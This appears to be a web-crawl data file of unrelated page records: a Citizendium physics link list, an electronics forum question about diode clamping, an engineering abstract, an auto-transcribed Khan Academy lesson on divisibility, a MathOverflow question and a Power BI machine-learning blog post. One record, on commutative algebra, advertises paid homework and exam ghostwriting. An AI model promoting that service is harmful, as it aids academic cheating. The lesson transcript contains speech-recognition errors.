{"ft_lang_label":"__label__en","ft_lang_prob":0.92139906,"math_prob":0.94626826,"size":9072,"snap":"2022-05-2022-21","text_gpt3_token_len":2041,"char_repetition_ratio":0.15902074,"word_repetition_ratio":0.09716088,"special_character_ratio":0.23555997,"punctuation_ratio":0.11904762,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9727906,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-25T22:20:13Z\",\"WARC-Record-ID\":\"<urn:uuid:9137485f-28ec-4737-9d82-69bd45f154b2>\",\"Content-Length\":\"54494\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6b0bcf34-be0e-4d4a-b38b-f8aebbb6708f>\",\"WARC-Concurrent-To\":\"<urn:uuid:37dbac3d-985e-4bb2-ac38-45b5761eeca7>\",\"WARC-IP-Address\":\"192.64.113.86\",\"WARC-Target-URI\":\"https://essaywritersexpert.com/assignment-week-3-exercise-course-math-201b2-summmer-2014/\",\"WARC-Payload-Digest\":\"sha1:BCVVPERGZYOS5TTVCUL2NKHDEHYYU4LM\",\"WARC-Block-Digest\":\"sha1:VYLBWOJO45SFIBWATJEGABUTTETXRPVM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662594414.79_warc_CC-MAIN-20220525213545-20220526003545-00697.warc.gz\"}"}
https://en.citizendium.org/wiki/Divergence/Related_Articles
[ "# Divergence/Related Articles", null, "", null, "Main Article Discussion Related Articles  [?] Bibliography  [?] External Links  [?] Citable Version  [?] A list of Citizendium articles, and planned articles, about Divergence.\n\n## Bot-suggested topics\n\nAuto-populated based on Special:WhatLinksHere/Divergence. Needs checking by a human.\n\n• Coulomb's law [r]: An inverse-square distance law, like Newton's gravitational law, describing the forces acting between electric point charges; also valid for the force between magnetic poles. [e]\n• Derivative [r]: The rate of change of a function with respect to its argument. [e]\n• Divergence theorem [r]: A theorem relating the flux of a vector field through a surface to the vector field inside the surface. [e]\n• Electric displacement [r]: a vector field D in a dielectric; D is proportional to the outer electric field E. [e]\n• Electric field [r]: force acting on an electric charge—a vector field. [e]\n• Gauss' law (magnetism) [r]: States that the total magnetic flux through a closed surface is zero; this means that magnetic monopoles do not exist. [e]\n• Helmholtz decomposition [r]: Decomposition of a vector field in a transverse (divergence-free) and a longitudinal (curl-free) component. [e]\n• James Clerk Maxwell [r]: (1831 – 1879) Scottish physicist best known for his formulation of electromagnetic theory and the statistical theory of gases. [e]\n• Magnetic induction [r]: A divergence-free electromagnetic field, denoted B, determining the Lorentz force upon a moving charge, and related to the magnetic field H. [e]\n• Maxwell equations [r]: Mathematical equations describing the interrelationship between electric and magnetic fields; dependence of the fields on electric charge- and current- densities. [e]\n• Spherical polar coordinates [r]: Angular coordinates on a sphere: longitude angle φ, colatitude angle θ [e]\n• Vector field [r]: A vector function on the three-dimensional Euclidean space $\\mathbb {E} ^{3}$", null, ". [e]" ]
[ null, "https://s9.addthis.com/button1-share.gif", null, "https://en.citizendium.org/wiki/images/4/4f/Statusbar2.png", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/759fbb70b744830ed9db0aa3a810647fff3e2614", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85087687,"math_prob":0.9323325,"size":1943,"snap":"2022-05-2022-21","text_gpt3_token_len":446,"char_repetition_ratio":0.15832904,"word_repetition_ratio":0.0,"special_character_ratio":0.22233659,"punctuation_ratio":0.11676647,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99775726,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-17T15:48:19Z\",\"WARC-Record-ID\":\"<urn:uuid:6e162d7b-4586-4555-8493-67d7987f11c6>\",\"Content-Length\":\"40869\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b9a27804-7aea-433c-a558-d7adfb35e6a0>\",\"WARC-Concurrent-To\":\"<urn:uuid:2be2102e-a4d7-46b0-af11-813f805cfa65>\",\"WARC-IP-Address\":\"208.100.31.41\",\"WARC-Target-URI\":\"https://en.citizendium.org/wiki/Divergence/Related_Articles\",\"WARC-Payload-Digest\":\"sha1:OWZIDAYINNVB5CFUGPXUK6Y7BAUVO7QV\",\"WARC-Block-Digest\":\"sha1:V7DADCDRE5CXUPVQRRQXFIURU3AUVMFI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662517485.8_warc_CC-MAIN-20220517130706-20220517160706-00694.warc.gz\"}"}
https://electronics.stackexchange.com/questions/508336/usb-supply-protection-using-shotkey-diode
[ "# USB supply protection using shotkey diode\n\nHere is the atached schematic of the clamping diode condition. Isolated the connection to contoller and kept the end open. When USB input is varied above 5V the expected output is diode cathode voltage (5V) + diode drop, which I was getting when im simulating the same.\n\nTried to test the same condition on board level buy varying the USB input above 5V ,I'm seeing the same USB input voltage at output (diode anode). Please let me know what is the problem in real case.", null, "• what's the problem? This sounds right. – Marcus Müller Jul 1 '20 at 12:08\n• Testing result it not same as simulation. If USB input is 10 V(continuous input), the voltage is at diode anode is 10V, but the actual to be 5v + diode drop. Let us know how to test this. – Rohan Kharvi Jul 1 '20 at 12:38\n• The diode is named after the German physicist Walter H. Schottky. It is also called Schottky (with a capital 'S'). – Transistor Jul 1 '20 at 13:09" ]
[ null, "https://i.stack.imgur.com/7uNQR.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8745922,"math_prob":0.89454174,"size":469,"snap":"2021-31-2021-39","text_gpt3_token_len":113,"char_repetition_ratio":0.14193548,"word_repetition_ratio":0.0,"special_character_ratio":0.21321961,"punctuation_ratio":0.07692308,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9532565,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-28T13:49:40Z\",\"WARC-Record-ID\":\"<urn:uuid:ec657dbd-39d7-4ae4-833a-5203973120ea>\",\"Content-Length\":\"169417\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e1f2d0bb-547a-4d41-84b2-467a2ba35522>\",\"WARC-Concurrent-To\":\"<urn:uuid:1c722df8-bc42-4e8d-aeff-432eef7b8016>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://electronics.stackexchange.com/questions/508336/usb-supply-protection-using-shotkey-diode\",\"WARC-Payload-Digest\":\"sha1:OBMAVSQVY2JUE7GHM3J7JKRCCDXWG4K2\",\"WARC-Block-Digest\":\"sha1:56PFGM5YPULEVAMM2QVFZQR4GVPJUOUP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046153729.44_warc_CC-MAIN-20210728123318-20210728153318-00223.warc.gz\"}"}
http://www.actapress.com/Abstract.aspx?paperId=32238
[ "## NOVEL SINGLE-PHASE TO SINGLE-PHASE CYCLOCONVERSION STRATEGIES: MATHEMATICAL AND SIMULATION STUDIES\n\nS. Jeevananthan, P. Dananjayan, and R. Madhavan\n\n### Keywords\n\nCycloconverter, total harmonic distortion, cosine wave crossing method, half wave symmetry variable firing angle method, quarter wave symmetry variable firing angle method\n\n### Abstract\n\nThis paper presents two novel control strategies for single-phase to single-phase cycloconversion. The proposed half wave symmetry variable firing angle method (HWSVFAM) and quarter wave sym- metry variable firing angle method (QWSVFAM) offer enhanced fundamental component at low total harmonic distortion (THD). Complete mathematical relations for input side performance indices (distortion factor, displacement factor and power factor) and output side performance indices (fundamental component and THD) are developed for the analysis of proposed schemes and comparison with the existing strategies. Results of the simulation have been validated with the mathematical equations and the superiority of the proposed schemes is confirmed." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.78941745,"math_prob":0.69017416,"size":983,"snap":"2020-24-2020-29","text_gpt3_token_len":195,"char_repetition_ratio":0.1154239,"word_repetition_ratio":0.054263566,"special_character_ratio":0.16276704,"punctuation_ratio":0.1,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9593397,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-05-29T16:32:16Z\",\"WARC-Record-ID\":\"<urn:uuid:66c57c6d-ac5e-4e0b-a10c-fe6a4993d12b>\",\"Content-Length\":\"19704\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:50294f8b-0d35-4dd2-aa39-4602f44eb01c>\",\"WARC-Concurrent-To\":\"<urn:uuid:fd73e5b3-81a0-425c-87f7-bcede1ae9076>\",\"WARC-IP-Address\":\"162.223.123.100\",\"WARC-Target-URI\":\"http://www.actapress.com/Abstract.aspx?paperId=32238\",\"WARC-Payload-Digest\":\"sha1:MOQSDXLB7NPC7HRLAWHDKU2BV3LOXXPO\",\"WARC-Block-Digest\":\"sha1:ZNSI6IW3SFEKPUUKN2ZBS5FH7GUIQKQN\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347405558.19_warc_CC-MAIN-20200529152159-20200529182159-00337.warc.gz\"}"}
https://www.khanacademy.org/math/pre-algebra/pre-algebra-factors-multiples/pre-algebra-divisibility-tests/v/recognizing-divisibility?playlist=Developmental%20Math
[ "If you're seeing this message, it means we're having trouble loading external resources on our website.\n\nIf you're behind a web filter, please make sure that the domains *.kastatic.org and *.kasandbox.org are unblocked.\n\nMain content\n\n# Recognizing divisibility\n\n## Video transcript\n\ndetermine whether 380 is divisible by 2 3 4 5 6 9 or 10 they skipped 7 & 8 so we don't have to worry about those so let's think about 2 so let's think about so are we divisible by 2 let me write the 2 here divisible by 2 well in order for something to be divisible by 2 it has to be an even number and to be an even number your ones digits so let me read that rewrite 380 to be even your ones digit has to be even so then this has to be even and for this to be even it has to be 0 2 4 6 or 8 and this is 0 so 380 is even which means it is divisible by 2 so it works with 2 so 2 works out let's think about the situation 4 3 now a quick way to think about 3 so let me write just 3 question mark is to add the digits of your number and if the sum that you get is divisible by 3 then you are divisible by 3 so let's try to do that so 380 let's add the digits 3 plus 8 plus 0 is equal to 3 plus 8 is 11 plus 0 is so it's just 11 and if you have trouble with figuring out with a dissident like 3 you could then just add these two numbers again so you can actually add the 1 plus 1 again and you would get a 2 regardless of whether you look at the 11 or the 2 neither of these are divisible by 3 so not not divisible visible 5/3 maybe in a future video I'll explain why this works and maybe you want to think about why this works so these aren't divisible by 3 so three hundred eighty so three hundred and eighty is not divisible 380 not not divisible by three so three does not work we are not divisible by three now let's think about the situation let's think about the situation for 4 so if we're thinking about 4 divisibility so let me write it in orange so we are wondering about for now something you may or may not already realize is that 100 is divisible by 4 it goes evenly so this is 380 so the 300 is divisible by 4 so we just have to figure out whether the left over whether the 80 is divisible by 4 another way to think about it is are the last two digits last two digits divisible by 4 and this comes from the fact that 100 is divisible by 4 so everything on the hundreds place were above it's going to be the life or you just have to worry about the last part so in this situation is 80 divisible by 4 now you could I ball that you could say well 8 is definitely divisible by 4 or 80 divided by 8 divided by 4 is 2 80 divided by 4 is 20 so this works yes yes so since 80 is divisible by 4 380 is also divisible by 4 so 4 works for work so let's do 5 make sure you scroll down a little bit let's try 5 so what's the pattern when something is divisible by 5 let's do the multiples of 5 5 10 15 20 25 so if something is divisible by 5 I could keep going so divisible by 5 that means it ends with either a 5 or a 0 right every multiple of 5 either has a 5 or a 0 in the ones place so 5 or 0 in ones place ones place now 380 has a 0 in the ones place so it is divisible by 5 now let's think about the situation for 6 let's think about what happens with 6 so we want to know are we divisible by 6 so to be divisible by 6 you have to be divisible by the things that make up 6 remember 6 is equal to 2 times 3 so if you're divisible by 6 that means you're divisible by - and you are divisible by three if you're divisible by both 2 and 3 you will be 
divisible by 6 now 380 is divisible by 2 but we've already established that it is not divisible by 3 if it's not divisible by 3 it cannot be divisible by 6 so this gets knocked out we are not divisible by 6 now let's go to 9 let's go to 9 so divisibility by 9 so you can make a similar argument here that if if something is not divisible by 3 there's no way it's going to be divisible by 9 because 9 9 is equal to 3 times 3 so to be divisible by 9 you have to be divisible by it by 3 at least twice at least two threes have to go into your number and this isn't the case so you could already knock nine out but if we didn't already know that we're not divisible by 3 the other way to do it is a very similar way to figure out divisible by divisibility by 3 and we can add the digits so you add 3 + 8 + 0 and you get 11 and you say is this divisible by 9 and you say this is not divisible by 9 so 380 must not be divisible by 9 and for 3 you do the same thing but you test whether the sum is divisible by 3 for 9 you test with a certain is 1 by 9 so last Li we have the number 10 we have the number 10 and this is in some level the easiest one what do all the multiples of 10 look like 10 20 30 40 we could just keep going on and on they all end with zero or if something ends with zero it is divisible by 10 380 is the visit does end with zero or it's once place does have a zero on it so it is divisible by 10 so we're divisible by all of these numbers except for 3 6 & 9" ]
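The tests walked through in the transcript translate directly into code. Here is a small Python sketch (not part of the video) that applies the same rules to 380, or to any other positive integer:

```python
def divisibility_checks(n):
    """Apply the rules described above for 2, 3, 4, 5, 6, 9 and 10."""
    digits = [int(d) for d in str(n)]
    digit_sum = sum(digits)
    last_digit = digits[-1]
    last_two = n % 100
    return {
        2: last_digit % 2 == 0,                          # ones digit is even
        3: digit_sum % 3 == 0,                           # digit sum divisible by 3
        4: last_two % 4 == 0,                            # last two digits divisible by 4
        5: last_digit in (0, 5),                         # ends in 0 or 5
        6: last_digit % 2 == 0 and digit_sum % 3 == 0,   # divisible by both 2 and 3
        9: digit_sum % 9 == 0,                           # digit sum divisible by 9
        10: last_digit == 0,                             # ends in 0
    }

print(divisibility_checks(380))
# {2: True, 3: False, 4: True, 5: True, 6: False, 9: False, 10: True}
```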
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.97600114,"math_prob":0.9540999,"size":4723,"snap":"2021-04-2021-17","text_gpt3_token_len":1249,"char_repetition_ratio":0.21974994,"word_repetition_ratio":0.04775549,"special_character_ratio":0.27503705,"punctuation_ratio":0.0,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9934728,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-11T04:39:06Z\",\"WARC-Record-ID\":\"<urn:uuid:93e80568-d8fe-472a-8fc0-8916057608d4>\",\"Content-Length\":\"203464\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c7ae8c31-b139-4d99-8cbb-1c9e5270d819>\",\"WARC-Concurrent-To\":\"<urn:uuid:7126c931-87a1-4470-95e9-e02dd42657eb>\",\"WARC-IP-Address\":\"151.101.201.42\",\"WARC-Target-URI\":\"https://www.khanacademy.org/math/pre-algebra/pre-algebra-factors-multiples/pre-algebra-divisibility-tests/v/recognizing-divisibility?playlist=Developmental%20Math\",\"WARC-Payload-Digest\":\"sha1:EKCFRNPD5BYWSME42M5GIZIXPY524JWU\",\"WARC-Block-Digest\":\"sha1:GMXRWRDWNNGUKXBDTE326A2LBWRYHDTH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038060927.2_warc_CC-MAIN-20210411030031-20210411060031-00442.warc.gz\"}"}
https://www.statistics-lab.com/%E6%95%B0%E5%AD%A6%E4%BB%A3%E5%86%99%E4%BA%A4%E6%8D%A2%E4%BB%A3%E6%95%B0%E4%BB%A3%E5%86%99commutative-algebra%E4%BB%A3%E8%80%83math3303/
[ "### 数学代写|交换代数代写commutative algebra代考|MATH3303", null, "statistics-lab™ 为您的留学生涯保驾护航 在代写交换代数commutative algebra方面已经树立了自己的口碑, 保证靠谱, 高质且原创的统计Statistics代写服务。我们的专家在代写交换代数commutative algebra代写方面经验极为丰富,各种代写交换代数commutative algebra相关的作业也就用不着说。\n\n• Statistical Inference 统计推断\n• Statistical Computing 统计计算\n• (Generalized) Linear Models 广义线性模型\n• Statistical Machine Learning 统计机器学习\n• Longitudinal Data Analysis 纵向数据分析\n• Foundations of Data Science 数据科学基础\n\n## 数学代写|交换代数代写commutative algebra代考|Commutative rings and ideals\n\nThe most fundamental object of this book is a commutative ring having a multiplicative identity element. Throughout the text, one refers to it simply as a ring.\n\nA ring homomorphism (or simply, a homomorphism) is a map $\\varphi: R \\rightarrow S$ between rings, which besides being compatible with the two operations, is also required to map the multiplicative identity element of $R$ to the one of $S$. If no confusion arises, one usually denotes the multiplicative identity of any ring by 1 , even if there is more than one ring involved in the discussion. A ring homomorphism $R \\rightarrow S$ that admits an inverse ring homomorphism $S \\rightarrow R$ is called an isomorphism. As is easily seen, any bijective homomorphism is an isomorphism.\n\nThe kernel of $\\varphi$ is the set $\\operatorname{ker} \\varphi:={a \\in R \\mid \\varphi(a)=0}$. It is easy to see that $\\operatorname{ker} \\varphi$ is an ideal of $R$ and induces an injective homomorphism $R / \\operatorname{ker} \\varphi \\hookrightarrow S$. Because of Proposition 1.1.2 below, one often moves over to the subring $R / \\operatorname{ker} \\varphi$ for the sake of an argument.\n\nGiven an arbitrary homomorphism $\\varphi: R \\rightarrow S$, one can move back and forth between ideals of $S$ and of $R$ : given an ideal $J \\subset S$, the inverse image $\\varphi^{-1}(J) \\subset R$ is an ideal of $R$, while given an ideal $I \\subset R$ one obtain the ideal of $S$ generated by the set $\\varphi(I)$. The first such move is called a contraction-a terminology that rigorously makes better sense when $R \\subset S$; in the second move, the ideal generated by $\\varphi(I)$ is called the extended ideal of $I$.\n\nA subgroup of the additive group of a ring $R$ is called a subring provided it is closed under the product operation of $R$ and contains the multiplicative identity of $R$.\n\nAn element $a \\in R$ is said to be a zero-divisor if there exists $b \\in R, b \\neq 0$, such that $a b=0$; otherwise, $a$ is called a nonzero divisor. In this book, a nonzero divisor will often be referred to as a regular element. A sort of extreme case of a zero-divisor is a nilpotent element $a$, such that $a^{n}=0$ for some $n \\geq 1$.\n\nOne assumes a certain familiarity with these notions and their elementary manipulation.\n\nA terminology that will appear very soon is that of an $R$-algebra to designate a ring $S$ with a homomorphism $R \\rightarrow S$.\n\n## 数学代写|交换代数代写commutative algebra代考|Sum of ideals\n\nThe set theoretic union of two ideals $I, J \\subset R$ is not an ideal, unless one of them is contained in the other. So, one takes the ideal generated by $I \\cup J$-this is called the ideal sum of the two ideals and is denoted by $I+J$ or $(I, J)$. The second notation was largely favored in parts of the classical literature and is the one to be employed in this book. 
On the other hand, the first notation and the terminology are largely justified by the fact that a typical element of $I+J$ has the form $a+a^{\\prime}$, with $a \\in I$ and $a^{\\prime} \\in J$, thus sharing the goodies of the notion of summing two subgroups of an additively written Abelian group or two subspaces of a vector space. In particular, an arbitrary expression $a+a^{\\prime}$ uniquely determines its summands if and only if $I \\cap J=\\{0\\}$. In the case of Abelian groups or vector spaces, this condition implies direct sum $I \\oplus J$. However, the burden carried by the ring multiplication and by the ideal theoretic main property causes the null intersection to be a somewhat rare phenomenon, since it requires lots of zero-divisors in the ring.\n\nIn contrast to the case of ideal intersection, the ideal sum is easily obtained in terms of generators, namely, if $I=(S)$ and $J=\\left(S^{\\prime}\\right)$ then $(I, J)=\\left(S \\cup S^{\\prime}\\right)$. Note that, since $S \\cap S^{\\prime} \\subset S \\cup S^{\\prime}$, there are quite a few superfluous generators in the union. The ideal sum notion applies ipsis literis to an arbitrary family of ideals and appears quite often in the argument of a general proof, and is a useful construction as such.\n\n## Math Writing Help | Commutative Algebra (commutative algebra) Writing and Exam Help | Product of ideals\n\nGiven ideals $I, J \\subset R$, the set $\\{a b \\mid a \\in I, b \\in J\\}$ of products is not an ideal either (unless at least one of them is principal). The ideal generated by this set is called the ideal product and is denoted by IJ. Here, the generators question is rather trivial, for if $I=(S)$ and $J=\\left(S^{\\prime}\\right)$ then the ideal product $I J$ is generated by the set $\\left\\{s s^{\\prime} \\mid s \\in S, s^{\\prime} \\in S^{\\prime}\\right\\}$.\nNote the relation of the product to the intersection: as $I J$ is contained both in $I R$ and in $J R$, it follows that $I J \\subset I \\cap J$. Thus, a measure of obstruction as to when $I \\cap J=\\{0\\}$ holds is that $I J=\\{0\\}$, which says that every element of one ideal is zero-divided by every element of the second ideal, a rather severe condition. At the other end of the spectrum, the equality $I J=I \\cap J$ seldom takes place, turning out to be rather a difficult condition of “transversality.”\n\nThe ideal product extends easily to a finite family of ideals. A special, nevertheless exceedingly important, case is that of a constant family $\\left\\{I_{i}\\right\\}_{i=1}^{m}, I_{i}=I(1 \\leq i \\leq m)$. In this case, the ideal product is called the $m$th power of the ideal $I$ and is naturally denoted by $I^{m}$. Note that if $I=\\left(s_{1}, \\ldots, s_{n}\\right)$ then $I^{m}$ is generated by the “monomials” of “degree” $m$ in $s_{1}, \\ldots, s_{n}$. The question as to how many of these monomial-like generators are actually superfluous turns out to be a rather deep question related to the notion of analytic independence of ideal generators, a tall order in modern commutative algebra. Besides, the chain $R=I^{0} \\supset I=I^{1} \\supset I^{2} \\supset \\cdots$ plus the multiplication rule $I^{m} I^{n}=I^{m+n}$ give rise to deep considerations in both commutative algebra and algebraic geometry.
The two topics are in fact quite intertwined." ]
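A concrete worked example (not from the text above) may help fix the three constructions. In the ring $R = \mathbb{Z}$, take the principal ideals $I = (4)$ and $J = (6)$:

```latex
I + J = (4, 6) = (\gcd(4, 6)) = (2), \qquad
I J = (4 \cdot 6) = (24), \qquad
I \cap J = (\operatorname{lcm}(4, 6)) = (12).
```

This exhibits the general containment $IJ \subseteq I \cap J$ and shows that it can be strict: $(24) \subsetneq (12)$.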
[ null, "https://www.statistics-lab.com/wp-content/uploads/2022/06/image-544.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.50009006,"math_prob":0.9966381,"size":10799,"snap":"2022-40-2023-06","text_gpt3_token_len":5928,"char_repetition_ratio":0.10819824,"word_repetition_ratio":0.010842369,"special_character_ratio":0.21761274,"punctuation_ratio":0.0831928,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99964166,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-30T12:17:16Z\",\"WARC-Record-ID\":\"<urn:uuid:ae46791d-fe61-4381-ae3c-5804c2b57ba7>\",\"Content-Length\":\"155713\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e0aa3768-9060-46fd-b31e-ffa707d5f861>\",\"WARC-Concurrent-To\":\"<urn:uuid:b43f3acc-7a1d-4cfd-aab4-d694e150b8d1>\",\"WARC-IP-Address\":\"172.67.148.182\",\"WARC-Target-URI\":\"https://www.statistics-lab.com/%E6%95%B0%E5%AD%A6%E4%BB%A3%E5%86%99%E4%BA%A4%E6%8D%A2%E4%BB%A3%E6%95%B0%E4%BB%A3%E5%86%99commutative-algebra%E4%BB%A3%E8%80%83math3303/\",\"WARC-Payload-Digest\":\"sha1:STXEVBR2WBWDMGCAFT3V3TZ6G5F4JA4D\",\"WARC-Block-Digest\":\"sha1:42MTV5LMHYD73LBVEHNNYCVO4Y3KVHDE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499816.79_warc_CC-MAIN-20230130101912-20230130131912-00306.warc.gz\"}"}
https://mathoverflow.net/questions/343199/the-infty-category-of-n-manifolds-and-open-embeddings-determined-homotopica
[ "# The $\\infty$-category of $n$-manifolds and open embeddings determined homotopically from that of topological manifolds?\n\nLet $$\\mathrm{Diff}_n$$, $$\\mathrm{PL}_n$$, $$\\mathrm{Top}_n$$ denote the $$\\infty$$-categories of $$n$$-manifolds which are respectively smooth/PL/topological, and open embeddings (for instance by taking the homotopy coherent nerve of the sing of the corresponding topological categories).\n\nLet $$\\operatorname{BTop}(n)$$ and $$\\mathrm{B}O(n)$$ be the classifying spaces of topological respectively orthogonal $$\\mathbb{R}^n$$-bundles. Similarly let $$\\operatorname{BPL}(n)$$ denote the classifying space of $$\\mathrm{PL}$$-bundles of rank $$n$$ (it's not quite the classifying space of a topological group but is actually the simplicial set classifying $$\\mathrm{PL}$$ bundles over polyhedra). Let $$\\mathcal{S}_{/X}$$ denote the slice category of the $$\\infty$$-category of spaces over a fixed space $$X$$. There's a canonical commutative diagram of $$\\infty$$-categories (for the middle row in this diagram you have to work a bit but I'm pretty sure this is true): $$\\require{AMScd}$$\n\n$$\\begin{CD} \\mathrm{Diff}_n @>>> \\mathrm{PL}_n @>>> \\mathrm{Top}_n\\\\ @VVV @VVV @VVV \\\\ \\mathcal{S}_{/\\mathrm{B}O(n)} @>>> S_{ /\\mathrm{B}\\mathrm{PL}(n)} @>>> \\mathcal{S}_{/\\mathrm{BTop}(n)} \\end{CD}$$\n\nQuestion: (for $$n \\ne 4$$) Are all the squares in this diagram pullback squares? If so where can I find this or at least the relevant pieces of the argument?\n\n• I think you need to replace BO, BPL and BTop by their unstable versions. Then it sounds like a reformulation of smoothing theory as in Kirby-Siebenmann (which would even work for dimension 4 when going from PL to Diff). – skupers Oct 5 at 16:09\n• @skupers Having the stable versions is part of the statement which I think shiuld be true due to Product Structure theorems. Could you perhaps point at the exact statements from Kirby and Siebenmann you have in mind? – Saal Hardali Oct 5 at 16:17\n• The product structure theorems give $n$-equivalences, but here you ask for full homotopy equivalences. It is true that $Top(n)/PL(n)=Top/PL=K(\\mathbb Z/2,3)$, though, so that square is OK either way. Unstable PL bundles realize all Pontrjagin classes, while smooth ones don't. So there is a PL $S^3$ bundle on $S^{4n}$ with nontrivial $p_n$ that is not smoothable, but which your stable statement would imply smoothable. . . Also, $Top(n)$ probably isn't a topological group, either, and you should do something simplicial there, too. – Ben Wieland Oct 5 at 16:45\n• By Kisters theorem, BTop(n) defined as classifying n-dimensional topological microbundles is weakly equivalent to BHomeo(R^n). Anyway, it's Essay V.1 you want to look at. Another reference is Lashof's Embedding Spaxes – skupers Oct 5 at 17:52\n• Remark 3.29 of the paper arxiv.org/abs/1206.5522 claims that the answer is yes, and that this follows from Kirby-Siebenmann, but there is no precise reference. I was not able to find it in KS, but if you manage I would be quite interested to see it myself. – Yonatan Harpaz Oct 16 at 19:33" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.67847836,"math_prob":0.99651515,"size":1309,"snap":"2019-43-2019-47","text_gpt3_token_len":382,"char_repetition_ratio":0.14099617,"word_repetition_ratio":0.0,"special_character_ratio":0.27807486,"punctuation_ratio":0.04845815,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99958175,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-13T04:46:26Z\",\"WARC-Record-ID\":\"<urn:uuid:22f66986-94b5-4968-9289-88a437ac8680>\",\"Content-Length\":\"114913\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ca2b292e-8570-4db5-a0c2-0620e8233f01>\",\"WARC-Concurrent-To\":\"<urn:uuid:e837c049-9ace-4829-9c51-aa5a4b3a9b84>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://mathoverflow.net/questions/343199/the-infty-category-of-n-manifolds-and-open-embeddings-determined-homotopica\",\"WARC-Payload-Digest\":\"sha1:WZIR2O2GKHF5MXNHS7WEILUG6HGE3VGL\",\"WARC-Block-Digest\":\"sha1:EGRSHYFO4L5HJN3VREP7VSSBCWHCXS3H\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496665985.40_warc_CC-MAIN-20191113035916-20191113063916-00552.warc.gz\"}"}
https://powerbi.microsoft.com/tr-tr/blog/visualizing-and-interacting-with-your-azure-machine-learning-studio-experiments/
[ "# Visualizing and interacting with your Azure Machine Learning Studio experiments", null, "Microsoft Senior Program Manager Christian Berg is back with another entry in his series on becoming your organization's strategic advisor with Machine Learning and Power BI. If you need to catch up, you can find the five previous chapters summarized here on the blog.\n\n—————————————————————-\n\nVisualizing and exploring the results of your Azure Machine Learning Studio (ML Studio) experiments is useful both when developing and evaluating the model but most importantly when deploying your model and presenting the results. With Power BI Desktop this can be done in two ways, either by writing the results from the model to a database that you then connect Power BI to, or by using an R script visual (Rviz). Using an Rviz has the advantage that you can dynamically select the subset of the Power BI model that you want to score. This enables powerful What-If Analysis scenarios where you can use R and ML Studio to assess the distribution of likely outcomes based on the counterfactuals.\n\nIn this example we will look at connecting to an Azure ML Studio experiment with an Rviz and then building on that to create a dynamic report to explore cross price elasticities. We will also look at a simpler example where we instead use DAX to explore the impact of different discount percentages, based on an assumption about our elasticity.\n\nFor the example report we have an ensemble regression model that was built in ML Studio to predict revenue by store, product and month using historic data, marketing information and future prices. The timeseries component is pre-calculated from part two.\n\n## Using the example report\n\nFor this report to work in Power BI Desktop you need the packages AzureML and ggplot2 installed. If you have not previously used these packages on your computer, install them by going to your R console in R Studio or other R GUI and copy/paste install.packages(\"AzureML \"), and repeat that for “ggplot2”. If you are new to R, please see my previous post for installation instructions. Please note that AzureML uses networking services which are currently blocked in the Power BI service.\n\nWhen you open the example report and go to page 1 (Simple what-if analysis) you will see a line chart showing the 